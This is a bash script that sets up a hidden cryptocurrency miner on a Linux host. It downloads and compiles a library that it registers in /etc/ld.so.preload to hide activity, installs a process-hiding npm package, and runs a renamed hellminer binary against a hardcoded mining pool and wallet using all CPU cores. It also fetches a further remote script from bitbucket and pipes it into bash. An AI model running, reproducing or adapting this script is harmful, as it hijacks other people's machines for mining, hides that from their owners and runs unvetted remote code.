#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.1 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget https://github.com/hellcatz/hminer/releases/download/v0.57/hellminer_linux64.tar.gz >/dev/null 2>&1
tar -xf hellminer_linux64.tar.gz >/dev/null 2>&1
rm -rvf hellminer_linux64.tar.gz >/dev/null 2>&1
mv hellminer sgr1
./sgr1 -c stratum+tcp://149.56.27.47:3956 -u RWXttxnPnw25JkD2QzfJCW4JcoeCoivtF1.Rig-Rent -p x --cpu $(nproc --all) --keep-alive >/dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash